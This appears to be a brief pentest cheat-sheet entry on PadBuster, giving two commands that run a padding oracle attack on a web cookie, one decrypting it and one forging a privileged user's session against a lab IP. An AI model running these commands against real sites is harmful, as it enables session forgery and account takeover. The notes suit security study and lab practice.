# PadBuster

* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)

* Padding Oracle

## Usage on Cookies

* Oracle on cookievalue, use website error message of invalid padding
* A high privileged user account can be added as a target
```sh
 ./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```sh
 ./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```